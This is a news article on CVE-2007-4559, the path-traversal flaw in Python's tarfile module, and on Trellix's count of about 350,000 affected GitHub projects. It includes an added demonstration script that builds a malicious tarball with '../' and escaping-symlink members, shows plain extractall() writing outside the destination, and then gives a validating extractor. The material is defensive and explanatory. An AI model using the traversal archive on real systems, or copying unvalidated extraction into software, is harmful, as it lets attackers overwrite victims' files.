A giant 15-year-old flaw has been found in Python. It has “poisoned” hundreds of thousands of projects

22 September 2022 09:39



A vulnerability in Python's standard library has been publicly known since 2007. In the 15 years since, the developers have not fixed it in code, limiting themselves to a warning in the documentation. More than 350,000 open source projects are affected. This is far from the first such case in the history of Python.

Python is not perfect

A flaw in the Python programming language has come back to light after hiding in it for at least 15 years. According to Bleeping Computer, because it went unfixed for so long, it has spread into several hundred thousand projects written in Python.

According to preliminary data, at least 350,000 open source repositories are affected. How many closed-source programs contain the flaw remains unknown.

The problem is exacerbated by the fact that Python is one of the most popular programming languages in the world. Millions of programmers write in it.

Python developers have been unaware of “holes” in their projects for years

What raises more questions is that the existence of the vulnerability was never a secret. It was identified at the end of August 2007, but not only was it not closed, it was not even assigned a severity rating. To this day all it has is the fact of its existence and the identifier CVE-2007-4559.

The vulnerability lies in Python's tarfile module, in the tarfile.extract() and tarfile.extractall() functions, which do not sanitise the paths of archive members: a member whose name begins with “../” is written wherever that path points, outside the intended extraction directory. When a vulnerable application unpacks a malicious tarball via tarfile, the flaw can be used to overwrite arbitrary files on the victim's computer and, depending on which files are overwritten, to gain code execution.
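The following is an added example for this article, not code from Trellix, from CPython or from any of the affected projects. It constructs, in memory, a tarball whose member names climb out of the extraction directory (a “..” path and a symlink pointing outside, followed by a file written through that symlink), runs plain tarfile.extractall() on it to show where the files land, and then shows a hardened extractor that validates every member name and link target before writing anything. The function names, the sample member names and the temporary directories are assumptions of this example.

```python
# CVE-2007-4559 demo: a tarball that climbs out of the extraction directory,
# plain extractall() following it, and a hardened extractor. Added example,
# not code from Trellix or CPython; all archives are constructed in memory.
import io
import os
import tarfile
import tempfile
import warnings
from pathlib import Path

def _add(tar, name, data=None, symlink_to=None):
    # Append one member: a regular file (data) or a symlink (symlink_to).
    info = tarfile.TarInfo(name)
    if symlink_to is not None:
        info.type, info.linkname = tarfile.SYMTYPE, symlink_to
        tar.addfile(info)
    else:
        info.size = len(data)
        tar.addfile(info, io.BytesIO(data))

def build_malicious_tar() -> bytes:
    """Constructed sample: benign file, '..' traversal, symlink out of dest."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w") as tar:
        _add(tar, "pkg/README.txt", b"hello\n")
        _add(tar, "../../escaped.txt", b"pwned\n")        # classic traversal
        _add(tar, "pkg/link", symlink_to="../../")         # link out of dest
        _add(tar, "pkg/link/via_symlink.txt", b"pwned\n")  # write through it
    return buf.getvalue()

def build_benign_tar() -> bytes:
    """Constructed sample that a safe extractor must still accept."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w") as tar:
        d = tarfile.TarInfo("pkg")
        d.type, d.mode = tarfile.DIRTYPE, 0o755
        tar.addfile(d)
        _add(tar, "pkg/README.txt", b"hello\n")
        _add(tar, "pkg/data.bin", b"\x00\x01\x02")
    return buf.getvalue()

def naive_extract_escapes(tar_bytes: bytes) -> bool:
    """Unvalidated extractall() into <tmp>/a/b. True if a file landed in <tmp>
    itself (CVE-2007-4559); False where PEP 706's 'data' filter is the default."""
    with tempfile.TemporaryDirectory() as outer:
        dest = os.path.join(outer, "a", "b")
        os.makedirs(dest)
        try:
            with warnings.catch_warnings():
                warnings.simplefilter("ignore", DeprecationWarning)
                with tarfile.open(fileobj=io.BytesIO(tar_bytes)) as tar:
                    tar.extractall(dest)
        except (tarfile.TarError, OSError):  # e.g. OutsideDestinationError
            return False
        return os.path.exists(os.path.join(outer, "escaped.txt"))

class UnsafeArchive(ValueError):
    """A member would write or link outside the destination directory."""

def is_safe_member_name(name: str) -> bool:
    """Lexical check: relative, and no '..' survives normalisation. Deliberately
    not realpath()-based: a symlink extracted earlier changes later resolution."""
    if not name or os.path.isabs(name) or name.startswith(("/", "\\")):
        return False
    return ".." not in os.path.normpath(name).split(os.sep)

def safe_extractall(tar_bytes: bytes, dest: str) -> list:
    """Validate every member first; one bad member means nothing is written."""
    with tarfile.open(fileobj=io.BytesIO(tar_bytes), mode="r") as tar:
        members = tar.getmembers()
        for m in members:
            if not is_safe_member_name(m.name):
                raise UnsafeArchive(f"member escapes destination: {m.name!r}")
            if m.issym():  # symlink target is relative to the link's directory
                target = os.path.join(os.path.dirname(m.name), m.linkname)
                if not is_safe_member_name(target):
                    raise UnsafeArchive(f"symlink escapes: {m.name!r} -> {m.linkname!r}")
            elif m.islnk() and not is_safe_member_name(m.linkname):  # root-relative
                raise UnsafeArchive(f"hardlink escapes: {m.name!r} -> {m.linkname!r}")
            elif not (m.isfile() or m.isdir() or m.islnk()):
                raise UnsafeArchive(f"special file refused: {m.name!r}")
        if hasattr(tarfile, "data_filter"):  # PEP 706 available: apply it too
            tar.extractall(dest, members=members, filter="data")
        else:
            tar.extractall(dest, members=members)
    return [m.name for m in members]

def run_demo() -> dict:
    malicious, benign = build_malicious_tar(), build_benign_tar()
    out = {"naive_escaped": naive_extract_escapes(malicious)}
    with tempfile.TemporaryDirectory() as d:
        out["benign_members"] = safe_extractall(benign, d)
        out["benign_contents"] = (Path(d) / "pkg" / "README.txt").read_bytes()
    with tempfile.TemporaryDirectory() as d:
        try:
            safe_extractall(malicious, d)
            out["malicious_rejected"] = False
        except UnsafeArchive as exc:
            out["malicious_rejected"], out["reason"] = True, str(exc)
        out["dest_untouched"] = not any(Path(d).iterdir())
    return out
```

Call run_demo() and look at naive_escaped: on an interpreter that applies no extraction filter it is True, escaped.txt appears two levels above the directory passed to extractall(), and the file written through pkg/link lands one level above it. Since Python 3.12 (PEP 706, also backported to 3.8.17, 3.9.17, 3.10.12 and 3.11.4) tarfile accepts filter="data", which the safe extractor uses when present, and from 3.14 that filter is the default, so the naive call raises instead of escaping. The lexical check still matters: pre-validating with realpath() can be fooled by a symlink that the same archive creates earlier, so the checks are made on the member names as written, and nothing is extracted until every member has passed.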

Nobody does anything

For 15 years the Python developers, and the Python Software Foundation behind the language, did nothing in code to protect users of programs in which the vulnerability is hidden. Nor did they make any effort to bring the problem to developers' attention.

As a result, for a decade and a half hardly anyone remembered CVE-2007-4559, which, admittedly, somewhat reduced the risk of its exploitation by cybercriminals. The vulnerability resurfaced in early 2022 during the investigation of another Python-related security issue. However, even renewed coverage of the situation did not prompt the language's developers to correct it.

Exploitation of the CVE-2007-4559 vulnerability in Python

It must be said that the developers did respond, after a fashion. Their response has been a warning in the Python documentation that “archives from untrusted sources can be dangerous.” Apparently they consider the job done: the entry for CVE-2007-4559 in the Python bug tracker was closed on that basis.

The scale is shocking

In 2022, CVE-2007-4559 was rediscovered by Trellix researchers. They were studying a quite different problem in Python, but wanted to know how dangerous their find was.

To determine the true extent of the disaster, the researchers took a sample of 257 repositories which, by their estimate, were the most likely to contain vulnerable code. They manually checked 175 of them, and that was already enough: the “hole” was present in 61% of them.

At the second stage, an automated check of the remaining repositories was run. As a result, the share of projects containing CVE-2007-4559 rose to 65%.

Later, GitHub, the Microsoft-owned code hosting service, joined the study. “With the help of GitHub, we were able to obtain a much larger dataset, including 588,840 unique repositories that include import tarfile in their Python code,” Trellix said.

In total, according to the researchers, at least 350 thousand projects on GitHub turned out to be vulnerable. The situation could be even worse: GitHub Copilot, the service that helps programmers write code, was trained on GitHub repositories, including these, so CVE-2007-4559 may be reproduced in a far larger number of projects than were counted.

Copilot caught red-handed: it suggests that programmers use dangerous code

In addition to drawing attention to the vulnerability and the risk associated with it, Trellix has also prepared fixes for just over 11,000 projects on GitHub. The fixes are published in forks of the affected repositories and will later be offered to the main projects as pull requests.

The researchers expect more than 70 thousand projects to receive a fix in the next few weeks. Reaching 100% is not an easy task, since the maintainers also have to accept the pull requests.

Familiar situation

The Python Software Foundation does not always seem to be in a hurry to patch dangerous vulnerabilities. The situation with CVE-2007-4559 is not without precedent.

For example, almost six years ago, at the very beginning of 2017, information spread widely about “holes” in Python libraries that made it possible to establish connections bypassing firewalls and to carry out a number of other attacks. The problem was the absence of proper syntax checking of the commands sent over established FTP connections, which allowed arbitrary commands to be injected.

Remarkably, the Python developers had been notified of them by outside researchers as early as 2016, but were slow to fix them. Only wide publicity forced them to prepare the necessary patches.

Evgeny Cherkesov
